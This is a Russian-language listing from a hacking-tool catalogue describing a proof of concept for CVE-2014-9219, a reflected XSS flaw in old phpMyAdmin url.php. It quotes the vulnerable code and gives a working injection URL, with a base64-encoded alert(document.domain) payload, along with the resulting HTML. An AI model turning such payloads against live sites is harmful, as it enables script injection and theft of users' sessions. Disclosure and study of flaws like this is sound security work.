Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2014-9219 — CVE-2014-9219 XSS POC | Kitploit
Инструменты/GitHubGitHub/mohmadhafiz/cve-2014-9219
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на Проникновение
GitHubmohmadhafiz/cve-2014-9219

CVE-2014-9219

CVE-2014-9219 XSS POC

Репозиторий
10 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2014-9219

CVE-2014-9219 XSS POC

О программе

Уязвимость вызвана ошибкой проверки ввода в функции перенаправления в url.php в phpMyAdmin 4.2.x до 4.2.13.1 при обработке параметра url. Удаленный злоумышленник может обманом заставить жертву перейти по специально созданной ссылке и выполнить произвольный HTML и скриптовый код в браузере жертвы в контексте безопасности уязвимого веб-сайта.

Затронутые версии

phpMyAdmin: 4.2.0 - 4.2.13

Проблема

Уязвимый код использует htmlspecialchars() для очистки параметра URL перед вставкой в контекст строки JavaScript:

root@kitploit:~
window.location='" . htmlspecialchars($_GET['url']) . "';

htmlspecialchars() предназначен для контекста HTML, а не для контекста строки JavaScript. Он неэффективно экранирует символы, которые могут выйти за пределы литералов строк JavaScript.

посмотреть коммит

POC

URL в кодировке:

root@kitploit:~
url.php?url=http%3A%2F%2Fwww.phpmyadmin.net%2F'%2beval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=='))%2b'
Скачать инструмент

URL в декодированном виде:

root@kitploit:~
url.php?url=http://www.phpmyadmin.net/'+eval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=='))+'

Вывод HTML:

root@kitploit:~
<script type='text/javascript'>
            window.onload=function(){
                window.location='http://www.phpmyadmin.net/'+eval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=='))+'';
            }
        </script>Taking you to http://www.phpmyadmin.net/'+eval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=='))+'.